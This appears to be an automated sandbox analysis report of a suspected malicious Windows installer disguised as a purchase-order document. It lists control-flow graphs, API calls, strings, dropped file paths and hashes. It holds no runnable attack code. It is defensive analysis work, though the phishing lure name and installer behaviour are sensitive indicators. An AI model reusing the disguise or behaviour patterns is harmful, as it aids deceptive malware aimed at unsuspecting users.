                                                                                                                                                                control_flow_graph 602 405454-40547a call 405712 605 405493-40549a 602->605 606 40547c-40548e DeleteFileA 602->606 608 40549c-40549e 605->608 609 4054ad-4054bd call 405b77 605->609 607 40561d-405621 606->607 610 4054a4-4054a7 608->610 611 4055cb-4055d0 608->611 615 4054cc-4054cd call 40566b 609->615 616 4054bf-4054ca lstrcatA 609->616 610->609 610->611 611->607 613 4055d2-4055d5 611->613 617 4055d7-4055dd 613->617 618 4055df-4055e7 call 405e7b 613->618 619 4054d2-4054d5 615->619 616->619 617->607 618->607 626 4055e9-4055fd call 405624 call 40540c 618->626 622 4054e0-4054e6 lstrcatA 619->622 623 4054d7-4054de 619->623 625 4054eb-405509 lstrlenA FindFirstFileA 622->625 623->622 623->625 627 4055c1-4055c5 625->627 628 40550f-405526 call 40564f 625->628 638 405615-405618 call 404e84 626->638 639 4055ff-405602 626->639 627->611 630 4055c7 627->630 636 405531-405534 628->636 637 405528-40552c 628->637 630->611 641 405536-40553b 636->641 642 405547-405555 call 405b77 636->642 637->636 640 40552e 637->640 638->607 639->617 644 405604-405613 call 404e84 call 405a2b 639->644 640->636 646 4055a0-4055b2 FindNextFileA 641->646 647 40553d-40553f 641->647 652 405557-40555f 642->652 653 40556c-405577 call 40540c 642->653 644->607 646->628 650 4055b8-4055bb FindClose 646->650 647->642 651 405541-405545 647->651 650->627 651->642 651->646 652->646 655 405561-405565 call 405454 652->655 662 405598-40559b call 404e84 653->662 663 405579-40557c 653->663 661 40556a 655->661 661->646 662->646 665 405590-405596 663->665 666 40557e-40558e call 404e84 call 405a2b 663->666 665->646 666->646
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 0040547D
                                                                                                                                                                • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 004054C5
                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 004054E6
                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 004054EC
                                                                                                                                                                • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 004054FD
                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AA
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004055BB
                                                                                                                                                                Strings
                                                                                                                                                                • "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", xrefs: 00405454
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405462
                                                                                                                                                                • \*.*, xrefs: 004054BF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                • API String ID: 2035342205-1825977890
                                                                                                                                                                • Opcode ID: a324933f258540b044efcfe334312fa73fb273d9979f8c99fd1672fc9b6fdbd7
                                                                                                                                                                • Instruction ID: 6c887a6cd9596c43cc691a5f5e4ea67afdeb508a4c755cd09b57e0a75bcacbf5
                                                                                                                                                                • Opcode Fuzzy Hash: a324933f258540b044efcfe334312fa73fb273d9979f8c99fd1672fc9b6fdbd7
                                                                                                                                                                • Instruction Fuzzy Hash: 6F51C030800A04BACB21AB21CC45BBF7AB9DF42318F54817BF455B11D2D73C9A82DEAD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 844 405e7b-405e8f FindFirstFileA 845 405e91-405e9a FindClose 844->845 846 405e9c 844->846 847 405e9e-405e9f 845->847 846->847
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,007A0548,outvillain\faber.div,00405755,outvillain\faber.div,outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,76DC3410,00405474,?,C:\Users\user\AppData\Local\Temp\,76DC3410), ref: 00405E86
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405E92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                • String ID: outvillain\faber.div
                                                                                                                                                                • API String ID: 2295610775-1876387199
                                                                                                                                                                • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                                                                                                                                • Instruction ID: e3a419463b19944544fc21c9ad6669fb55d517ae4bfd2eba5619c06405e9773a
                                                                                                                                                                • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                                                                                                                                                • Instruction Fuzzy Hash: 6AD012319195205BC3406738AC0C89F7B69DB563317304B32B5BDF12E0C2389D628AE9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 855 405ea2-405ebc GetModuleHandleA 856 405ec9-405ed0 GetProcAddress 855->856 857 405ebe-405ec7 LoadLibraryA 855->857 858 405ed6-405ed8 856->858 857->856 857->858
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                                                                                                                                • Instruction ID: 2f3dee603afa82187d4e64c95529cacee06f2ec99598d25ed76f38a586475c1c
                                                                                                                                                                • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                                                                                                                                                • Instruction Fuzzy Hash: FBE08C32A04610ABC6209B209D0896B77ACEB88B41300497EF945F6151D734AC119BBA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 113 4039b4-4039c6 114 403b07-403b16 113->114 115 4039cc-4039d2 113->115 117 403b65-403b7a 114->117 118 403b18-403b60 GetDlgItem * 2 call 403e87 SetClassLongA call 40140b 114->118 115->114 116 4039d8-4039e1 115->116 119 4039e3-4039f0 SetWindowPos 116->119 120 4039f6-4039f9 116->120 122 403bba-403bbf call 403ed3 117->122 123 403b7c-403b7f 117->123 118->117 119->120 125 403a13-403a19 120->125 126 4039fb-403a0d ShowWindow 120->126 131 403bc4-403bdf 122->131 128 403b81-403b8c call 401389 123->128 129 403bb2-403bb4 123->129 132 403a35-403a38 125->132 133 403a1b-403a30 DestroyWindow 125->133 126->125 128->129 144 403b8e-403bad SendMessageA 128->144 129->122 130 403e54 129->130 139 403e56-403e5d 130->139 137 403be1-403be3 call 40140b 131->137 138 403be8-403bee 131->138 142 403a3a-403a46 SetWindowLongA 132->142 143 403a4b-403a51 132->143 140 403e31-403e37 133->140 137->138 147 403e12-403e2b DestroyWindow EndDialog 138->147 148 403bf4-403bff 138->148 140->130 145 403e39-403e3f 140->145 142->139 149 403af4-403b02 call 403eee 143->149 150 403a57-403a68 GetDlgItem 143->150 144->139 145->130 152 403e41-403e4a ShowWindow 145->152 147->140 148->147 153 403c05-403c52 call 405b99 call 403e87 * 3 GetDlgItem 148->153 149->139 154 403a87-403a8a 150->154 155 403a6a-403a81 SendMessageA IsWindowEnabled 150->155 152->130 183 403c54-403c59 153->183 184 403c5c-403c98 ShowWindow KiUserCallbackDispatcher call 403ea9 EnableWindow 153->184 156 403a8c-403a8d 154->156 157 403a8f-403a92 154->157 155->130 155->154 160 403abd-403ac2 call 403e60 156->160 161 403aa0-403aa5 157->161 162 403a94-403a9a 157->162 160->149 164 403adb-403aee SendMessageA 161->164 166 403aa7-403aad 161->166 162->164 165 403a9c-403a9e 162->165 164->149 165->160 169 403ac4-403acd call 40140b 166->169 170 403aaf-403ab5 call 40140b 166->170 169->149 179 403acf-403ad9 169->179 181 403abb 170->181 179->181 181->160 183->184 187 403c9a-403c9b 184->187 188 403c9d 184->188 189 403c9f-403ccd GetSystemMenu EnableMenuItem SendMessageA 187->189 188->189 190 403ce2 189->190 191 403ccf-403ce0 SendMessageA 189->191 192 403ce8-403d21 call 403ebc call 405b77 lstrlenA call 405b99 SetWindowTextA call 401389 190->192 191->192 192->131 201 403d27-403d29 192->201 201->131 202 403d2f-403d33 201->202 203 403d52-403d66 DestroyWindow 202->203 204 403d35-403d3b 202->204 203->140 206 403d6c-403d99 CreateDialogParamA 203->206 204->130 205 403d41-403d47 204->205 205->131 207 403d4d 205->207 206->140 208 403d9f-403df6 call 403e87 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 206->208 207->130 208->130 213 403df8-403e0b ShowWindow call 403ed3 208->213 215 403e10 213->215 215->140
                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F0
                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403A0D
                                                                                                                                                                • DestroyWindow.USER32 ref: 00403A21
                                                                                                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A3D
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403A5E
                                                                                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A72
                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403A79
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403B27
                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403B31
                                                                                                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B4B
                                                                                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B9C
                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403C42
                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403C63
                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C75
                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C90
                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA6
                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403CAD
                                                                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC5
                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD8
                                                                                                                                                                • lstrlenA.KERNEL32(Konkursbehandling Setup: Installing,?,Konkursbehandling Setup: Installing,007A1F00), ref: 00403D01
                                                                                                                                                                • SetWindowTextA.USER32(?,Konkursbehandling Setup: Installing), ref: 00403D10
                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403E44
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                • String ID: Konkursbehandling Setup: Installing
                                                                                                                                                                • API String ID: 3282139019-2442837211
                                                                                                                                                                • Opcode ID: 0c2cc5d366c93ad890157e52a419f655f0959c8ae2dd263d948fed7b28de4683
                                                                                                                                                                • Instruction ID: 08d6703954b26bba67f61acca2d9aa754b0d4f7535d1ee947126766f28ce6238
                                                                                                                                                                • Opcode Fuzzy Hash: 0c2cc5d366c93ad890157e52a419f655f0959c8ae2dd263d948fed7b28de4683
                                                                                                                                                                • Instruction Fuzzy Hash: 42C1C231904200ABEB21AF25ED45E2B7EACF745706F04453EFA41B11E1C77DA982DB6E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 216 403622-40363a call 405ea2 219 40363c-40364c call 405ad5 216->219 220 40364e-40367f call 405a5e 216->220 227 4036a2-4036cb call 4038e7 call 405712 219->227 225 403681-403692 call 405a5e 220->225 226 403697-40369d lstrcatA 220->226 225->226 226->227 234 4036d1-4036d6 227->234 235 403752-40375a call 405712 227->235 234->235 236 4036d8-4036f0 call 405a5e 234->236 241 403768-40378d LoadImageA 235->241 242 40375c-403763 call 405b99 235->242 240 4036f5-4036fc 236->240 240->235 243 4036fe-403700 240->243 245 40380e-403816 call 40140b 241->245 246 40378f-4037bf RegisterClassA 241->246 242->241 248 403711-40371d lstrlenA 243->248 249 403702-40370f call 40564f 243->249 257 403820-40382b call 4038e7 245->257 258 403818-40381b 245->258 250 4037c5-403809 SystemParametersInfoA CreateWindowExA 246->250 251 4038dd 246->251 255 403745-40374d call 405624 call 405b77 248->255 256 40371f-40372d lstrcmpiA 248->256 249->248 250->245 253 4038df-4038e6 251->253 255->235 256->255 261 40372f-403739 GetFileAttributesA 256->261 269 403831-40384e ShowWindow LoadLibraryA 257->269 270 4038b4-4038b5 call 404f56 257->270 258->253 262 40373b-40373d 261->262 263 40373f-403740 call 40566b 261->263 262->255 262->263 263->255 272 403850-403855 LoadLibraryA 269->272 273 403857-403869 GetClassInfoA 269->273 274 4038ba-4038bc 270->274 272->273 275 403881-4038a4 DialogBoxParamA call 40140b 273->275 276 40386b-40387b GetClassInfoA RegisterClassA 273->276 277 4038d6-4038d8 call 40140b 274->277 278 4038be-4038c4 274->278 282 4038a9-4038b2 call 403572 275->282 276->275 277->251 278->258 280 4038ca-4038d1 call 40140b 278->280 280->258 282->253
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                                                                                                                                                  • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                                                                                                                                                  • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                                                                                                                                                • lstrcatA.KERNEL32(1033,Konkursbehandling Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Konkursbehandling Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76DC3410,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",00000000), ref: 0040369D
                                                                                                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\udskriftskartotek\chiromancy\refalling,1033,Konkursbehandling Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Konkursbehandling Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403712
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 00403725
                                                                                                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 00403730
                                                                                                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\udskriftskartotek\chiromancy\refalling), ref: 00403779
                                                                                                                                                                  • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                                                                                                                                                • RegisterClassA.USER32(007A1EA0), ref: 004037B6
                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037CE
                                                                                                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403803
                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403839
                                                                                                                                                                • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384A
                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 00403855
                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 00403865
                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403872
                                                                                                                                                                • RegisterClassA.USER32(007A1EA0), ref: 0040387B
                                                                                                                                                                • DialogBoxParamA.USER32(?,00000000,004039B4,00000000), ref: 0040389A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\udskriftskartotek\chiromancy\refalling$Call$Control Panel\Desktop\ResourceLocale$Konkursbehandling Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                • API String ID: 914957316-2772059276
                                                                                                                                                                • Opcode ID: c7dc5bc517227d642f1141329839a7512a010cb895aab6e766c5c3cb5a21175c
                                                                                                                                                                • Instruction ID: b0afc0e10dc8cbe2448bed9474bc03f366f348945261fe302a10aac9679cd79a
                                                                                                                                                                • Opcode Fuzzy Hash: c7dc5bc517227d642f1141329839a7512a010cb895aab6e766c5c3cb5a21175c
                                                                                                                                                                • Instruction Fuzzy Hash: FA61E6716442007EE710BB659C85F373AACEB8275AF00857EFA45B22E2D67D6D01CB2D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
                                                                                                                                                                  • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                                                                                                                  • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B76
                                                                                                                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 10001BC2
                                                                                                                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 10001BCC
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001BE6
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001CD3
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001CD8
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001E79
                                                                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 10001FCB
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000008), ref: 1000203D
                                                                                                                                                                • LoadLibraryA.KERNEL32(00000008), ref: 1000204E
                                                                                                                                                                • lstrlenA.KERNEL32(00000408), ref: 10002082
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$HandleLibraryLoadModulelstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 226667998-0
                                                                                                                                                                • Opcode ID: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
